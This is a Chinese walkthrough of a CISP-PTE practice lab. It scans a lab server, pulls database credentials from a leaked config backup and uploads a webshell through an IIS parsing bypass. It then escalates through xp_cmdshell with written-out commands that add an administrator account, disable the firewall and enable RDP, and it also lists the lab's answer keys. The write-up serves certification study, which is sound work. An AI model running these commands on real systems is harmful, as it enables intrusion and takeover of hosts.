前言
环境可以在这里下载:https://download.csdn.net/download/beirry/87272606
。
在渗透前先配置下环境:
服务端IIS重新注册:
Key1
首先我们已知目标服务器IP为192.168.127.131,则第一步做的就是对端口进行扫描。
nmap -sS -p 0-65535 192.168.127.131
访问下27689
则可能是个web站点,目录扫描下看有什么东西
从robots.txt文件可以看到有两个目录和一个默认页面
由于已知无法访问目录,所以直接访问Default.aspx,Default.aspx为文件上传下载系统
再看下其他url,admin目录和user目录下的页面都需要登录后才能看到内容
再点击下载web.config.bak文件,查看是否存在敏感信息。
里面存在着sqlserver的账号密码,用navicat连接数据库
通过数据库我们得知admin的密码为asdadwn_d2112
返回登录系统,输入账号密码获得key1
key1:4k3s9m3d
Key2
浏览后台,存在文件上传,测试是否有文件上传漏洞。
上传asp文件,被禁止。
burp抓包尝试绕过,利用IIS的解析漏洞进行绕过
文件名后还多了一个分号符.j,通过下面的注意事项来看,我们可以构造一个长一点的名字来将分号符挤掉。
访问cisp-pte.jpg查看是否能看到路径
通过以上报错信息我们获取到了绝对路径,那么通过拼接我们可以获取到木马的路径,用冰蝎连接目标
连接成功
得到key2:2a3s9p4d
Key3
在终端中无法看到相关信息以及操作,则得知不是高权限用户。
通过浏览web.config.bak.2017-12-12得到sa的密码。
以sa的身份重新连接sqlsever。
利用xp_cmdshell提权
#开启xp_cmdshell
exec sp_configure 'show advanced options', 1;
reconfigure;
exec sp_configure 'xp_cmdshell',1;
reconfigure;
添加hacker账号
exec master..xp_cmdshell 'net user hacker 123456 /add'
将hacker添加到管理组
exec master..xp_cmdshell "net localgroup administrators hacker /add"
关闭防火墙
exec master..xp_cmdshell "NetSh firewall set opmode mode=disable"
开启3389端口
exec master..xp_cmdshell "wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1"
远程连接服务器
用户名:hacker 密码:123456
通过遍历目录找到key3在administrator的桌面下
Key3:4d9d3q8v
此综合题整体来说还是比较简单的,除了最后一个key如果不借助平时积累的情况下很难记得这么多的命令,但其实后面一个key不拿也不影响考证,毕竟70分及格,实操题拿70分就够了,基本上5道专项题和实操前两道都不算难。